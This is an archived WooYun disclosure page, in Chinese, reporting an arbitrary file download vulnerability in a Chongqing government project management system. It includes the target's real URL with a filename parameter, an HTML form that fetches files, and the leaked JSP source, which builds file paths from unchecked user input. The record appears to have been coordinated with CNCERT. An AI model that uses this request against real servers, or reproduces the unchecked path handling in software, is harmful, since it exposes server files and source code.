重庆市科技计划项目管理系统文件下载漏洞（可下载jsp源码）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093111

漏洞标题：重庆市科技计划项目管理系统文件下载漏洞（可下载jsp源码）

漏洞作者：猎人

提交时间：2015-01-22 11:36

修复时间：2015-03-08 11:38

公开时间：2015-03-08 11:38

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-22：细节已通知厂商并且等待厂商处理中
2015-01-26：厂商已经确认，细节仅向厂商公开
2015-02-05：细节向核心白帽子及相关领域专家公开
2015-02-15：细节向普通白帽子公开
2015-02-25：细节向实习白帽子公开
2015-03-08：细节向公众公开

简要描述：

任意文件下载

详细说明：

漏洞url:
http://xmgl.cstc.gov.cn/kwxmgl/jsp/nosession/download.jsp?filename=download.jsp

<form name="Form1" method="post" action="http://xmgl.cstc.gov.cn/kwxmgl/jsp/nosession/download.jsp" id="Form1"> 
	<input type="text" name="filename" value="download.jsp"/>
	<input type="submit" value="go"/>
  </form>

漏洞证明：

<%@page language="java" contentType="application/x-msdownload" import="java.io.*,java.net.*" pageEncoding="gb2312"%>
<%
String filename = request.getParameter("filename");//ÎÄ¼þÃû
String filepath = this.getClass().getClassLoader().getResource("/").getPath();//Â·¾¶
//filepath="http://"+request.getServerName()+":"+request.getServerPort()+request.getContextPath()+"/"+filename;
response.reset();//¿ÉÒÔ¼ÓÒ²¿ÉÒÔ²»¼Ó
response.setContentType("application/x-download");//ÉèÖÃÎªÏÂÔØapplication/x-download
filename = URLEncoder.encode(filename,"UTF-8");
response.addHeader("Content-Disposition","attachment;filename=" + filename);
//ÅÐ¶Ï·µ»ØÂ·¾¶ÓÐWEB-INFÊ±ÇÐµô£¬ÈôÊÇÃ»ÓÐ¾Í²»Ö´ÐÐ¡£
if(filepath.indexOf("WEB-INF")!=-1){
	filepath = filepath.substring(0,filepath.indexOf("WEB-INF")-1);
}
OutputStream output = null;
FileInputStream fis = null;
try
{
	output  = response.getOutputStream();
	fis = new FileInputStream(filepath+ "/"+filename);
	byte[] b = new byte[1024];
	int i = 0;
	while((i = fis.read(b)) > 0)
	{
		output.write(b, 0, i);
	}
	output.flush();
}
catch(Exception e)
{
	System.out.println("Error!");
	e.printStackTrace();
}
finally
{
	if(fis != null)
	{
		fis.close();
		fis = null;
	}
	if(output != null)
	{
		output.close();
		output = null;
	}
}
%>

修复方案：

额，修复方案就不解释了，找开发的吧

版权声明：转载请注明来源猎人@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-01-26 15:27

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给重庆分中心，由重庆分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093111

漏洞标题：重庆市科技计划项目管理系统文件下载漏洞（可下载jsp源码）

相关厂商：cncert国家互联网应急中心

漏洞作者：猎人

提交时间：2015-01-22 11:36

修复时间：2015-03-08 11:38

公开时间：2015-03-08 11:38

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猎人@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093111

漏洞标题：重庆市科技计划项目管理系统文件下载漏洞（可下载jsp源码）

相关厂商：cncert国家互联网应急中心

漏洞作者： 猎人

提交时间：2015-01-22 11:36

修复时间：2015-03-08 11:38

公开时间：2015-03-08 11:38

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-093111"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猎人@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猎人

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猎人@乌云